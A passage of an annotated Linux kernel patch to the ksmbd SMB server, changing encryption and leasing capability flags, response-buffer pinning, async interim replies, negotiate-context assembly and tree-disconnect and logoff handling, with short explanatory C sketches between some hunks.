+index ab23da2120b94..535402629655e 100644
+--- a/fs/smb/server/smb2ops.c
++++ b/fs/smb/server/smb2ops.c
+@@ -221,7 +221,8 @@ void init_smb3_0_server(struct ksmbd_conn *conn)
+ 	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
+ 
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING |
++			SMB2_GLOBAL_CAP_DIRECTORY_LEASING;
+ 
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION &&
+ 	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
+@@ -245,10 +246,12 @@ void init_smb3_02_server(struct ksmbd_conn *conn)
+ 	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
+ 
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING |
++			SMB2_GLOBAL_CAP_DIRECTORY_LEASING;
+ 
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION &&
+-	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION ||
++	    (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF) &&
++	     conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION))
+ 		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+ 
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+@@ -269,7 +272,13 @@ int init_smb3_11_server(struct ksmbd_conn *conn)
+ 	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
+ 
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING |
++			SMB2_GLOBAL_CAP_DIRECTORY_LEASING;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION ||
++	    (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF) &&
++	     conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION))
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+ 
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+ 		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
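
With the hunks above, both the 3.0.2 and 3.1.1 setup paths advertise SMB2_GLOBAL_CAP_ENCRYPTION when encryption is forced on, or when it is not forced off and the client advertises the capability; the new KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF flag only vetoes the client-driven case. A truth-table check of that predicate (the flag bits below are illustrative stand-ins):

#include <stdio.h>

#define ENC_ON  0x1u  /* stand-in for KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION */
#define ENC_OFF 0x2u  /* stand-in for KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF */

static int offer_encryption(unsigned int srv_flags, int client_caps_enc)
{
	return (srv_flags & ENC_ON) ||
	       (!(srv_flags & ENC_OFF) && client_caps_enc);
}

int main(void)
{
	printf("forced on,  client no : %d\n", offer_encryption(ENC_ON, 0));  /* 1 */
	printf("auto,       client yes: %d\n", offer_encryption(0, 1));       /* 1 */
	printf("auto,       client no : %d\n", offer_encryption(0, 0));       /* 0 */
	printf("forced off, client yes: %d\n", offer_encryption(ENC_OFF, 1)); /* 0 */
	return 0;
}
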
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 1598ad6155fef..ea48dd06d4da3 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -144,12 +144,18 @@ void smb2_set_err_rsp(struct ksmbd_work *work)
+ 		err_rsp = smb2_get_msg(work->response_buf);
+ 
+ 	if (err_rsp->hdr.Status != STATUS_STOPPED_ON_SYMLINK) {
++		int err;
++
+ 		err_rsp->StructureSize = SMB2_ERROR_STRUCTURE_SIZE2_LE;
+ 		err_rsp->ErrorContextCount = 0;
+ 		err_rsp->Reserved = 0;
+ 		err_rsp->ByteCount = 0;
+ 		err_rsp->ErrorData[0] = 0;
+-		inc_rfc1001_len(work->response_buf, SMB2_ERROR_STRUCTURE_SIZE2);
++		err = ksmbd_iov_pin_rsp(work, (void *)err_rsp,
++					__SMB2_HEADER_STRUCTURE_SIZE +
++						SMB2_ERROR_STRUCTURE_SIZE2);
++		if (err)
++			work->send_no_response = 1;
+ 	}
+ }
+ 
+@@ -224,11 +230,12 @@ void set_smb2_rsp_status(struct ksmbd_work *work, __le32 err)
+ {
+ 	struct smb2_hdr *rsp_hdr;
+ 
+-	if (work->next_smb2_rcv_hdr_off)
+-		rsp_hdr = ksmbd_resp_buf_next(work);
+-	else
+-		rsp_hdr = smb2_get_msg(work->response_buf);
++	rsp_hdr = smb2_get_msg(work->response_buf);
+ 	rsp_hdr->Status = err;
++
++	work->iov_idx = 0;
++	work->iov_cnt = 0;
++	work->next_smb2_rcv_hdr_off = 0;
+ 	smb2_set_err_rsp(work);
+ }
+ 
+@@ -244,9 +251,7 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 	struct smb2_hdr *rsp_hdr;
+ 	struct smb2_negotiate_rsp *rsp;
+ 	struct ksmbd_conn *conn = work->conn;
+-
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
++	int err;
+ 
+ 	rsp_hdr = smb2_get_msg(work->response_buf);
+ 	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+@@ -285,13 +290,14 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 	rsp->SecurityBufferLength = cpu_to_le16(AUTH_GSS_LENGTH);
+ 	ksmbd_copy_gss_neg_header((char *)(&rsp->hdr) +
+ 		le16_to_cpu(rsp->SecurityBufferOffset));
+-	inc_rfc1001_len(work->response_buf,
+-			sizeof(struct smb2_negotiate_rsp) -
+-			sizeof(struct smb2_hdr) - sizeof(rsp->Buffer) +
+-			AUTH_GSS_LENGTH);
+ 	rsp->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED_LE;
+ 	if (server_conf.signing == KSMBD_CONFIG_OPT_MANDATORY)
+ 		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
++	err = ksmbd_iov_pin_rsp(work, rsp,
++				sizeof(struct smb2_negotiate_rsp) -
++				sizeof(rsp->Buffer) + AUTH_GSS_LENGTH);
++	if (err)
++		return err;
+ 	conn->use_spnego = true;
+ 
+ 	ksmbd_conn_set_need_negotiate(conn);
+@@ -390,11 +396,12 @@ static void init_chained_smb2_rsp(struct ksmbd_work *work)
+ 	next_hdr_offset = le32_to_cpu(req->NextCommand);
+ 
+ 	new_len = ALIGN(len, 8);
+-	inc_rfc1001_len(work->response_buf,
+-			sizeof(struct smb2_hdr) + new_len - len);
++	work->iov[work->iov_idx].iov_len += (new_len - len);
++	inc_rfc1001_len(work->response_buf, new_len - len);
+ 	rsp->NextCommand = cpu_to_le32(new_len);
+ 
+ 	work->next_smb2_rcv_hdr_off += next_hdr_offset;
++	work->curr_smb2_rsp_hdr_off = work->next_smb2_rsp_hdr_off;
+ 	work->next_smb2_rsp_hdr_off += new_len;
+ 	ksmbd_debug(SMB,
+ 		    "Compound req new_len = %d rcv off = %d rsp off = %d\n",
+@@ -470,10 +477,10 @@ bool is_chained_smb2_message(struct ksmbd_work *work)
+ 		len = len - get_rfc1002_len(work->response_buf);
+ 		if (len) {
+ 			ksmbd_debug(SMB, "padding len %u\n", len);
++			work->iov[work->iov_idx].iov_len += len;
+ 			inc_rfc1001_len(work->response_buf, len);
+-			if (work->aux_payload_sz)
+-				work->aux_payload_sz += len;
+ 		}
++		work->curr_smb2_rsp_hdr_off = work->next_smb2_rsp_hdr_off;
+ 	}
+ 	return false;
+ }
+@@ -488,11 +495,8 @@ int init_smb2_rsp_hdr(struct ksmbd_work *work)
+ {
+ 	struct smb2_hdr *rsp_hdr = smb2_get_msg(work->response_buf);
+ 	struct smb2_hdr *rcv_hdr = smb2_get_msg(work->request_buf);
+-	struct ksmbd_conn *conn = work->conn;
+ 
+ 	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+ 	rsp_hdr->ProtocolId = rcv_hdr->ProtocolId;
+ 	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+ 	rsp_hdr->Command = rcv_hdr->Command;
+@@ -508,12 +512,6 @@ int init_smb2_rsp_hdr(struct ksmbd_work *work)
+ 	rsp_hdr->SessionId = rcv_hdr->SessionId;
+ 	memcpy(rsp_hdr->Signature, rcv_hdr->Signature, 16);
+ 
+-	work->syncronous = true;
+-	if (work->async_id) {
+-		ksmbd_release_id(&conn->async_ida, work->async_id);
+-		work->async_id = 0;
+-	}
+-
+ 	return 0;
+ }
+ 
+@@ -549,7 +547,7 @@ int smb2_allocate_rsp_buf(struct ksmbd_work *work)
+ 	if (le32_to_cpu(hdr->NextCommand) > 0)
+ 		sz = large_sz;
+ 
+-	work->response_buf = kvmalloc(sz, GFP_KERNEL | __GFP_ZERO);
++	work->response_buf = kvzalloc(sz, GFP_KERNEL);
+ 	if (!work->response_buf)
+ 		return -ENOMEM;
+ 
+@@ -659,21 +657,16 @@ smb2_get_name(const char *src, const int maxlen, struct nls_table *local_nls)
+ 
+ int setup_async_work(struct ksmbd_work *work, void (*fn)(void **), void **arg)
+ {
+-	struct smb2_hdr *rsp_hdr;
+ 	struct ksmbd_conn *conn = work->conn;
+ 	int id;
+ 
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	rsp_hdr->Flags |= SMB2_FLAGS_ASYNC_COMMAND;
+-
+ 	id = ksmbd_acquire_async_msg_id(&conn->async_ida);
+ 	if (id < 0) {
+ 		pr_err("Failed to alloc async message id\n");
+ 		return id;
+ 	}
+-	work->syncronous = false;
++	work->asynchronous = true;
+ 	work->async_id = id;
+-	rsp_hdr->Id.AsyncId = cpu_to_le64(id);
+ 
+ 	ksmbd_debug(SMB,
+ 		    "Send interim Response to inform async request id : %d\n",
+@@ -691,18 +684,47 @@ int setup_async_work(struct ksmbd_work *work, void (*fn)(void **), void **arg)
+ 	return 0;
+ }
+ 
++void release_async_work(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++
++	spin_lock(&conn->request_lock);
++	list_del_init(&work->async_request_entry);
++	spin_unlock(&conn->request_lock);
++
++	work->asynchronous = 0;
++	work->cancel_fn = NULL;
++	kfree(work->cancel_argv);
++	work->cancel_argv = NULL;
++	if (work->async_id) {
++		ksmbd_release_id(&conn->async_ida, work->async_id);
++		work->async_id = 0;
++	}
++}
++
+ void smb2_send_interim_resp(struct ksmbd_work *work, __le32 status)
+ {
+ 	struct smb2_hdr *rsp_hdr;
++	struct ksmbd_work *in_work = ksmbd_alloc_work_struct();
+ 
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	smb2_set_err_rsp(work);
++	if (allocate_interim_rsp_buf(in_work)) {
++		pr_err("smb_allocate_rsp_buf failed!\n");
++		ksmbd_free_work_struct(in_work);
++		return;
++	}
++
++	in_work->conn = work->conn;
++	memcpy(smb2_get_msg(in_work->response_buf), ksmbd_resp_buf_next(work),
++	       __SMB2_HEADER_STRUCTURE_SIZE);
++
++	rsp_hdr = smb2_get_msg(in_work->response_buf);
++	rsp_hdr->Flags |= SMB2_FLAGS_ASYNC_COMMAND;
++	rsp_hdr->Id.AsyncId = cpu_to_le64(work->async_id);
++	smb2_set_err_rsp(in_work);
+ 	rsp_hdr->Status = status;
+ 
+-	work->multiRsp = 1;
+-	ksmbd_conn_write(work);
+-	rsp_hdr->Status = 0;
+-	work->multiRsp = 0;
++	ksmbd_conn_write(in_work);
++	ksmbd_free_work_struct(in_work);
+ }
+ 
+ static __le32 smb2_get_reparse_tag_special_file(umode_t mode)
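
smb2_send_interim_resp() above no longer mutates the in-progress response; it clones just the SMB2 header into a fresh work struct, flags it ASYNC, stamps the AsyncId, and writes that interim STATUS_PENDING reply out independently. A minimal sketch of that header stamping; the struct here is reduced to the fields involved and is not the real smb2_hdr (whose Id union overlays SyncId and AsyncId), though 0x2 does match MS-SMB2's SMB2_FLAGS_ASYNC_COMMAND:

#include <stdint.h>
#include <string.h>

#define FLAGS_ASYNC_COMMAND 0x00000002u

struct mini_hdr {
	uint32_t flags;
	uint64_t async_id;   /* stands in for the Id union in the real header */
	uint32_t status;
};

/* Clone the original header, then mark the copy as the async interim
 * STATUS_PENDING reply; the original response buffer stays untouched. */
static void make_interim(struct mini_hdr *interim, const struct mini_hdr *orig,
			 uint64_t async_id, uint32_t pending_status)
{
	memcpy(interim, orig, sizeof(*interim));
	interim->flags |= FLAGS_ASYNC_COMMAND;
	interim->async_id = async_id;
	interim->status = pending_status;
}
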
+@@ -774,19 +796,6 @@ static void build_encrypt_ctxt(struct smb2_encryption_neg_context *pneg_ctxt,
+ 	pneg_ctxt->Ciphers[0] = cipher_type;
+ }
+ 
+-static void build_compression_ctxt(struct smb2_compression_capabilities_context *pneg_ctxt,
+-				   __le16 comp_algo)
+-{
+-	pneg_ctxt->ContextType = SMB2_COMPRESSION_CAPABILITIES;
+-	pneg_ctxt->DataLength =
+-		cpu_to_le16(sizeof(struct smb2_compression_capabilities_context)
+-			- sizeof(struct smb2_neg_context));
+-	pneg_ctxt->Reserved = cpu_to_le32(0);
+-	pneg_ctxt->CompressionAlgorithmCount = cpu_to_le16(1);
+-	pneg_ctxt->Flags = cpu_to_le32(0);
+-	pneg_ctxt->CompressionAlgorithms[0] = comp_algo;
+-}
+-
+ static void build_sign_cap_ctxt(struct smb2_signing_capabilities *pneg_ctxt,
+ 				__le16 sign_algo)
+ {
+@@ -822,11 +831,10 @@ static void build_posix_ctxt(struct smb2_posix_neg_context *pneg_ctxt)
+ 	pneg_ctxt->Name[15] = 0x7C;
+ }
+ 
+-static void assemble_neg_contexts(struct ksmbd_conn *conn,
+-				  struct smb2_negotiate_rsp *rsp,
+-				  void *smb2_buf_len)
++static unsigned int assemble_neg_contexts(struct ksmbd_conn *conn,
++				  struct smb2_negotiate_rsp *rsp)
+ {
+-	char *pneg_ctxt = (char *)rsp +
++	char * const pneg_ctxt = (char *)rsp +
+ 			le32_to_cpu(rsp->NegotiateContextOffset);
+ 	int neg_ctxt_cnt = 1;
+ 	int ctxt_size;
+@@ -835,62 +843,46 @@ static void assemble_neg_contexts(struct ksmbd_conn *conn,
+ 		    "assemble SMB2_PREAUTH_INTEGRITY_CAPABILITIES context\n");
+ 	build_preauth_ctxt((struct smb2_preauth_neg_context *)pneg_ctxt,
+ 			   conn->preauth_info->Preauth_HashId);
+-	rsp->NegotiateContextCount = cpu_to_le16(neg_ctxt_cnt);
+-	inc_rfc1001_len(smb2_buf_len, AUTH_GSS_PADDING);
+ 	ctxt_size = sizeof(struct smb2_preauth_neg_context);
+-	/* Round to 8 byte boundary */
+-	pneg_ctxt += round_up(sizeof(struct smb2_preauth_neg_context), 8);
+ 
+ 	if (conn->cipher_type) {
++		/* Round to 8 byte boundary */
+ 		ctxt_size = round_up(ctxt_size, 8);
+ 		ksmbd_debug(SMB,
+ 			    "assemble SMB2_ENCRYPTION_CAPABILITIES context\n");
+-		build_encrypt_ctxt((struct smb2_encryption_neg_context *)pneg_ctxt,
++		build_encrypt_ctxt((struct smb2_encryption_neg_context *)
++				   (pneg_ctxt + ctxt_size),
+ 				   conn->cipher_type);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		neg_ctxt_cnt++;
+ 		ctxt_size += sizeof(struct smb2_encryption_neg_context) + 2;
+-		/* Round to 8 byte boundary */
+-		pneg_ctxt +=
+-			round_up(sizeof(struct smb2_encryption_neg_context) + 2,
+-				 8);
+ 	}
+ 
+-	if (conn->compress_algorithm) {
+-		ctxt_size = round_up(ctxt_size, 8);
+-		ksmbd_debug(SMB,
+-			    "assemble SMB2_COMPRESSION_CAPABILITIES context\n");
+-		/* Temporarily set to SMB3_COMPRESS_NONE */
+-		build_compression_ctxt((struct smb2_compression_capabilities_context *)pneg_ctxt,
+-				       conn->compress_algorithm);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
+-		ctxt_size += sizeof(struct smb2_compression_capabilities_context) + 2;
+-		/* Round to 8 byte boundary */
+-		pneg_ctxt += round_up(sizeof(struct smb2_compression_capabilities_context) + 2,
+-				      8);
+-	}
++	/* compression context not yet supported */
++	WARN_ON(conn->compress_algorithm != SMB3_COMPRESS_NONE);
+ 
+ 	if (conn->posix_ext_supported) {
+ 		ctxt_size = round_up(ctxt_size, 8);
+ 		ksmbd_debug(SMB,
+ 			    "assemble SMB2_POSIX_EXTENSIONS_AVAILABLE context\n");
+-		build_posix_ctxt((struct smb2_posix_neg_context *)pneg_ctxt);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		build_posix_ctxt((struct smb2_posix_neg_context *)
++				 (pneg_ctxt + ctxt_size));
++		neg_ctxt_cnt++;
+ 		ctxt_size += sizeof(struct smb2_posix_neg_context);
+-		/* Round to 8 byte boundary */
+-		pneg_ctxt += round_up(sizeof(struct smb2_posix_neg_context), 8);
+ 	}
+ 
+ 	if (conn->signing_negotiated) {
+ 		ctxt_size = round_up(ctxt_size, 8);
+ 		ksmbd_debug(SMB,
+ 			    "assemble SMB2_SIGNING_CAPABILITIES context\n");
+-		build_sign_cap_ctxt((struct smb2_signing_capabilities *)pneg_ctxt,
++		build_sign_cap_ctxt((struct smb2_signing_capabilities *)
++				    (pneg_ctxt + ctxt_size),
+ 				    conn->signing_algorithm);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		neg_ctxt_cnt++;
+ 		ctxt_size += sizeof(struct smb2_signing_capabilities) + 2;
+ 	}
+ 
+-	inc_rfc1001_len(smb2_buf_len, ctxt_size);
++	rsp->NegotiateContextCount = cpu_to_le16(neg_ctxt_cnt);
++	return ctxt_size + AUTH_GSS_PADDING;
+ }
+ 
+ static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
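
assemble_neg_contexts() now keeps a single running ctxt_size cursor and places each context at pneg_ctxt + ctxt_size after rounding the cursor up to an 8-byte boundary, instead of advancing a separate pointer in lockstep; the function returns the total so the caller can pin one correctly sized iovec. A compilable sketch of cursor-based, 8-byte-aligned record packing (names invented for illustration):

#include <stdio.h>
#include <string.h>

#define round_up(x, a) (((x) + (a) - 1) & ~((a) - 1))

/* Append one record at the next 8-byte boundary; returns the new cursor. */
static unsigned int pack(char *base, unsigned int cursor,
			 const void *rec, unsigned int len)
{
	cursor = round_up(cursor, 8);
	memcpy(base + cursor, rec, len);
	return cursor + len;
}

int main(void)
{
	char buf[64] = { 0 };
	unsigned int sz = 0;

	sz = pack(buf, sz, "AAAAA", 5);    /* ends at 5 */
	sz = pack(buf, sz, "BB", 2);       /* starts at 8, ends at 10 */
	sz = pack(buf, sz, "C", 1);        /* starts at 16, ends at 17 */
	printf("total payload size: %u\n", sz);
	return 0;
}
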
+@@ -935,7 +927,7 @@ static void decode_encrypt_ctxt(struct ksmbd_conn *conn,
+ 		return;
+ 	}
+ 
+-	if (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION))
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF)
+ 		return;
+ 
+ 	for (i = 0; i < cph_cnt; i++) {
+@@ -1106,7 +1098,7 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 	struct smb2_negotiate_req *req = smb2_get_msg(work->request_buf);
+ 	struct smb2_negotiate_rsp *rsp = smb2_get_msg(work->response_buf);
+ 	int rc = 0;
+-	unsigned int smb2_buf_len, smb2_neg_size;
++	unsigned int smb2_buf_len, smb2_neg_size, neg_ctxt_len = 0;
+ 	__le32 status;
+ 
+ 	ksmbd_debug(SMB, "Received negotiate request\n");
+@@ -1199,7 +1191,7 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 						 conn->preauth_info->Preauth_HashValue);
+ 		rsp->NegotiateContextOffset =
+ 				cpu_to_le32(OFFSET_OF_NEG_CONTEXT);
+-		assemble_neg_contexts(conn, rsp, work->response_buf);
++		neg_ctxt_len = assemble_neg_contexts(conn, rsp);
+ 		break;
+ 	case SMB302_PROT_ID:
+ 		init_smb3_02_server(conn);
+@@ -1249,9 +1241,6 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 	rsp->SecurityBufferLength = cpu_to_le16(AUTH_GSS_LENGTH);
+ 	ksmbd_copy_gss_neg_header((char *)(&rsp->hdr) +
+ 				  le16_to_cpu(rsp->SecurityBufferOffset));
+-	inc_rfc1001_len(work->response_buf, sizeof(struct smb2_negotiate_rsp) -
+-			sizeof(struct smb2_hdr) - sizeof(rsp->Buffer) +
+-			 AUTH_GSS_LENGTH);
+ 	rsp->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED_LE;
+ 	conn->use_spnego = true;
+ 
+@@ -1269,9 +1258,16 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 	ksmbd_conn_set_need_negotiate(conn);
+ 
+ err_out:
++	if (rc)
++		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++
++	if (!rc)
++		rc = ksmbd_iov_pin_rsp(work, rsp,
++				       sizeof(struct smb2_negotiate_rsp) -
++					sizeof(rsp->Buffer) +
++					AUTH_GSS_LENGTH + neg_ctxt_len);
+ 	if (rc < 0)
+ 		smb2_set_err_rsp(work);
+-
+ 	return rc;
+ }
+ 
+@@ -1471,7 +1467,6 @@ static int ntlm_authenticate(struct ksmbd_work *work,
+ 		memcpy((char *)&rsp->hdr.ProtocolId + sz, spnego_blob, spnego_blob_len);
+ 		rsp->SecurityBufferLength = cpu_to_le16(spnego_blob_len);
+ 		kfree(spnego_blob);
+-		inc_rfc1001_len(work->response_buf, spnego_blob_len - 1);
+ 	}
+ 
+ 	user = session_user(conn, req);
+@@ -1544,7 +1539,8 @@ static int ntlm_authenticate(struct ksmbd_work *work,
+ 			return -EINVAL;
+ 		}
+ 		sess->enc = true;
+-		rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
++		if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION)
++			rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
+ 		/*
+ 		 * signing is disabled if encryption is enabled
+ 		 * on this session
+@@ -1616,7 +1612,6 @@ static int krb5_authenticate(struct ksmbd_work *work,
+ 		return -EINVAL;
+ 	}
+ 	rsp->SecurityBufferLength = cpu_to_le16(out_len);
+-	inc_rfc1001_len(work->response_buf, out_len - 1);
+ 
+ 	if ((conn->sign || server_conf.enforced_signing) ||
+ 	    (req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED))
+@@ -1630,7 +1625,8 @@ static int krb5_authenticate(struct ksmbd_work *work,
+ 			return -EINVAL;
+ 		}
+ 		sess->enc = true;
+-		rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
++		if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION)
++			rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
+ 		sess->sign = false;
+ 	}
+ 
+@@ -1687,7 +1683,6 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 	rsp->SessionFlags = 0;
+ 	rsp->SecurityBufferOffset = cpu_to_le16(72);
+ 	rsp->SecurityBufferLength = 0;
+-	inc_rfc1001_len(work->response_buf, 9);
+ 
+ 	ksmbd_conn_lock(conn);
+ 	if (!req->hdr.SessionId) {
+@@ -1823,13 +1818,6 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 					goto out_err;
+ 				rsp->hdr.Status =
+ 					STATUS_MORE_PROCESSING_REQUIRED;
+-				/*
+-				 * Note: here total size -1 is done as an
+-				 * adjustment for 0 size blob
+-				 */
+-				inc_rfc1001_len(work->response_buf,
+-						le16_to_cpu(rsp->SecurityBufferLength) - 1);
+-
+ 			} else if (negblob->MessageType == NtLmAuthenticate) {
+ 				rc = ntlm_authenticate(work, req, rsp);
+ 				if (rc)
+@@ -1914,6 +1902,18 @@ out_err:
+ 				ksmbd_conn_set_need_negotiate(conn);
+ 			}
+ 		}
++		smb2_set_err_rsp(work);
++	} else {
++		unsigned int iov_len;
++
++		if (rsp->SecurityBufferLength)
++			iov_len = offsetof(struct smb2_sess_setup_rsp, Buffer) +
++				le16_to_cpu(rsp->SecurityBufferLength);
++		else
++			iov_len = sizeof(struct smb2_sess_setup_rsp);
++		rc = ksmbd_iov_pin_rsp(work, rsp, iov_len);
++		if (rc)
++			rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
+ 	}
+ 
+ 	ksmbd_conn_unlock(conn);
+@@ -1991,14 +1991,20 @@ int smb2_tree_connect(struct ksmbd_work *work)
+ 	if (conn->posix_ext_supported)
+ 		status.tree_conn->posix_extensions = true;
+ 
++	write_lock(&sess->tree_conns_lock);
++	status.tree_conn->t_state = TREE_CONNECTED;
++	write_unlock(&sess->tree_conns_lock);
+ 	rsp->StructureSize = cpu_to_le16(16);
+-	inc_rfc1001_len(work->response_buf, 16);
+ out_err1:
+ 	rsp->Capabilities = 0;
+ 	rsp->Reserved = 0;
+ 	/* default manual caching */
+ 	rsp->ShareFlags = SMB2_SHAREFLAG_MANUAL_CACHING;
+ 
++	rc = ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_tree_connect_rsp));
++	if (rc)
++		status.ret = KSMBD_TREE_CONN_STATUS_NOMEM;
++
+ 	if (!IS_ERR(treename))
+ 		kfree(treename);
+ 	if (!IS_ERR(name))
+@@ -2111,26 +2117,56 @@ int smb2_tree_disconnect(struct ksmbd_work *work)
+ 	struct smb2_tree_disconnect_req *req;
+ 	struct ksmbd_session *sess = work->sess;
+ 	struct ksmbd_tree_connect *tcon = work->tcon;
++	int err;
+ 
+ 	WORK_BUFFERS(work, req, rsp);
+ 
+-	rsp->StructureSize = cpu_to_le16(4);
+-	inc_rfc1001_len(work->response_buf, 4);
+-
+ 	ksmbd_debug(SMB, "request\n");
+ 
+-	if (!tcon || test_and_set_bit(TREE_CONN_EXPIRE, &tcon->status)) {
++	if (!tcon) {
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+ 
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+-		smb2_set_err_rsp(work);
+-		return 0;
++		err = -ENOENT;
++		goto err_out;
+ 	}
+ 
+ 	ksmbd_close_tree_conn_fds(work);
+-	ksmbd_tree_conn_disconnect(sess, tcon);
++
++	write_lock(&sess->tree_conns_lock);
++	if (tcon->t_state == TREE_DISCONNECTED) {
++		write_unlock(&sess->tree_conns_lock);
++		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
++		err = -ENOENT;
++		goto err_out;
++	}
++
++	WARN_ON_ONCE(atomic_dec_and_test(&tcon->refcount));
++	tcon->t_state = TREE_DISCONNECTED;
++	write_unlock(&sess->tree_conns_lock);
++
++	err = ksmbd_tree_conn_disconnect(sess, tcon);
++	if (err) {
++		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
++		goto err_out;
++	}
++
+ 	work->tcon = NULL;
++
++	rsp->StructureSize = cpu_to_le16(4);
++	err = ksmbd_iov_pin_rsp(work, rsp,
++				sizeof(struct smb2_tree_disconnect_rsp));
++	if (err) {
++		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++		goto err_out;
++	}
++
+ 	return 0;
++
++err_out:
++	smb2_set_err_rsp(work);
++	return err;
++
+ }
+ 
+ /**
+@@ -2146,17 +2182,23 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ 	struct smb2_logoff_rsp *rsp;
+ 	struct ksmbd_session *sess;
+ 	u64 sess_id;
++	int err;
+ 
+ 	WORK_BUFFERS(work, req, rsp);
+ 
+-	sess_id = le64_to_cpu(req->hdr.SessionId);
+-
+-	rsp->StructureSize = cpu_to_le16(4);
+-	inc_rfc1001_len(work->response_buf, 4);
+-
+ 	ksmbd_debug(SMB, "request\n");
+ 
++	ksmbd_conn_lock(conn);
++	if (!ksmbd_conn_good(conn)) {
++		ksmbd_conn_unlock(conn);
++		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
++		smb2_set_err_rsp(work);
++		return -ENOENT;
++	}
++	sess_id = le64_to_cpu(req->hdr.SessionId);
+ 	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_RECONNECT);
++	ksmbd_conn_unlock(conn);
++
+ 	ksmbd_close_session_fds(work);
+ 	ksmbd_conn_wait_idle(conn, sess_id);
+ 
+@@ -2169,7 +2211,7 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+ 		smb2_set_err_rsp(work);
+-		return 0;
++		return -ENOENT;
+ 	}
+ 
